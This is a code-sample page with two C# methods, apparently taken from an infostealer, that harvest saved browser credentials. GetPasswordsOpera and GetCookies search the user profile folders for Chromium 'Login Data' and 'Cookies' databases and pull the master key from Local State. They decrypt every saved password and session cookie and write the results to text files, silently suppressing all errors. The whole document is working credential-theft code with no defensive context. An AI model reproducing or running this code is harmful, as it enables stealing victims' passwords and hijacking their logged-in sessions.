Exemplo n.º 1
0
        public static void GetPasswordsOpera(string path2save)
        {
            try
            {
                List <string> Browsers = new List <string>();
                List <string> BrPaths  = new List <string>
                {
                    Help.AppDate,
                    Help.LocalData
                };
                var APD = new List <string>();

                foreach (var paths in BrPaths)
                {
                    try
                    {
                        APD.AddRange(Directory.GetDirectories(paths));
                    }
                    catch { }
                }

                foreach (var path in APD)
                {
                    string[] files  = null;
                    string   result = "";

                    try
                    {
                        Browsers.AddRange(Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories));
                        files = Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories);
                    }

                    catch { }
                    if (files != null)
                    {
                        foreach (var file in files)
                        {
                            try
                            {
                                if (File.Exists(file))
                                {
                                    string str = "Unknown";

                                    foreach (string name in BrowsersName)
                                    {
                                        if (path.Contains(name))
                                        {
                                            str = name;
                                        }
                                    }
                                    string loginData  = file;
                                    string localState = file + "\\..\\Local State";

                                    if (File.Exists(bd))
                                    {
                                        File.Delete(bd);
                                    }
                                    if (File.Exists(ls))
                                    {
                                        File.Delete(ls);
                                    }

                                    File.Copy(loginData, bd);
                                    File.Copy(localState, ls);

                                    SqlHandler      sqlHandler   = new SqlHandler(bd);
                                    List <PassData> passDataList = new List <PassData>();
                                    sqlHandler.ReadTable("logins");

                                    string keyStr = File.ReadAllText(ls);

                                    string[] lines = Regex.Split(keyStr, "\"");
                                    int      index = 0;
                                    foreach (string line in lines)
                                    {
                                        if (line == "encrypted_key")
                                        {
                                            keyStr = lines[index + 2];
                                            break;
                                        }
                                        index++;
                                    }


                                    byte[] keyBytes       = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
                                    byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
                                    int    rowCount       = sqlHandler.GetRowCount();

                                    for (int rowNum = 0; rowNum < rowCount; ++rowNum)
                                    {
                                        try
                                        {
                                            string passStr   = sqlHandler.GetValue(rowNum, 5);
                                            byte[] pass      = Encoding.Default.GetBytes(passStr);
                                            string decrypted = "";

                                            try
                                            {
                                                if (passStr.StartsWith("v10") || passStr.StartsWith("v11"))
                                                {
                                                    byte[] iv      = pass.Skip(3).Take(12).ToArray(); // From 3 to 15
                                                    byte[] payload = pass.Skip(15).ToArray();

                                                    decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
                                                }

                                                else
                                                {
                                                    decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(pass));
                                                }
                                            }

                                            catch { }

                                            result += "Url: " + sqlHandler.GetValue(rowNum, 1) + "\r\n";
                                            result += "Login: "******"\r\n";
                                            result += "Passwords: " + decrypted + "\r\n";
                                            result += "Browser: " + str + "\r\n\r\n";
                                            Passwords++;
                                        }
                                        catch
                                        {
                                        }
                                    }

                                    if (File.Exists(bd))
                                    {
                                        File.Delete(bd);
                                    }
                                    if (File.Exists(ls))
                                    {
                                        File.Delete(ls);
                                    }

                                    if (str == "Unknown")
                                    {
                                        File.AppendAllText(path2save + "\\" + "Passwords_" + str + ".txt", result);
                                    }

                                    else
                                    {
                                        File.WriteAllText(path2save + "\\" + "Passwords_" + str + ".txt", result);
                                    }
                                }
                            }
                            catch
                            {
                            }
                        }
                    }
                }
            }

            catch { }
        }
Exemplo n.º 2
0
        public static void GetCookies(string path2save)
        {
            try
            {
                List <string> Browsers = new List <string>();
                List <string> BrPaths  = new List <string>
                {
                    Help.AppDate,
                    Help.LocalData
                };
                var APD = new List <string>();

                foreach (var paths in BrPaths)
                {
                    try
                    {
                        APD.AddRange(Directory.GetDirectories(paths));
                    }
                    catch { }
                }

                foreach (var path in APD)
                {
                    string result = "";

                    string[] files = null;


                    try
                    {
                        Browsers.AddRange(Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories));
                        files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories);
                    }

                    catch { }
                    if (files != null)
                    {
                        foreach (var file in files)
                        {
                            try
                            {
                                if (File.Exists(file))
                                {
                                    string str = "Unknown";

                                    foreach (string name in BrowsersName)
                                    {
                                        if (path.Contains(name))
                                        {
                                            str = name;
                                        }
                                    }
                                    string loginData  = file;
                                    string localState = file + "\\..\\..\\Local State";

                                    if (File.Exists(bd))
                                    {
                                        File.Delete(bd);
                                    }
                                    if (File.Exists(ls))
                                    {
                                        File.Delete(ls);
                                    }

                                    File.Copy(loginData, bd);
                                    File.Copy(localState, ls);

                                    SqlHandler      sqlHandler   = new SqlHandler(bd);
                                    List <PassData> passDataList = new List <PassData>();
                                    sqlHandler.ReadTable("cookies");

                                    string keyStr = File.ReadAllText(ls);

                                    string[] lines = Regex.Split(keyStr, "\"");
                                    int      index = 0;
                                    foreach (string line in lines)
                                    {
                                        if (line == "encrypted_key")
                                        {
                                            keyStr = lines[index + 2];
                                            break;
                                        }
                                        index++;
                                    }


                                    byte[] keyBytes       = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
                                    byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
                                    int    rowCount       = sqlHandler.GetRowCount();

                                    for (int rowNum = 0; rowNum < rowCount; ++rowNum)
                                    {
                                        try
                                        {
                                            string valueStr  = sqlHandler.GetValue(rowNum, 12);
                                            byte[] value     = Encoding.Default.GetBytes(valueStr);
                                            string decrypted = "";

                                            try
                                            {
                                                if (valueStr.StartsWith("v10"))
                                                {
                                                    // Console.WriteLine("!=============== AES 256 GCM COOKIES ============!");

                                                    byte[] iv      = value.Skip(3).Take(12).ToArray(); // From 3 to 15
                                                    byte[] payload = value.Skip(15).ToArray();

                                                    decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
                                                }
                                                else
                                                {
                                                    decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(value));
                                                }

                                                string host_key    = sqlHandler.GetValue(rowNum, 1),
                                                       name        = sqlHandler.GetValue(rowNum, 2),
                                                       PATH        = sqlHandler.GetValue(rowNum, 4),
                                                       expires_utc = sqlHandler.GetValue(rowNum, 5),
                                                       secure      = sqlHandler.GetValue(rowNum, 6);

                                                result += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", host_key, PATH, secure.ToUpper(), expires_utc, name, decrypted);
                                                Cookies++;
                                            }

                                            catch { }
                                        }
                                        catch { }
                                    }

                                    if (File.Exists(bd))
                                    {
                                        File.Delete(bd);
                                    }
                                    if (File.Exists(ls))
                                    {
                                        File.Delete(ls);
                                    }

                                    if (str == "Unknown")
                                    {
                                        File.AppendAllText(path2save + "\\" + "Cookies_" + str + ".txt", result);
                                    }

                                    else
                                    {
                                        File.WriteAllText(path2save + "\\" + "Cookies_" + str + ".txt", result);
                                    }
                                }
                            }
                            catch { }
                        }
                    }
                }
            }

            catch { }
        }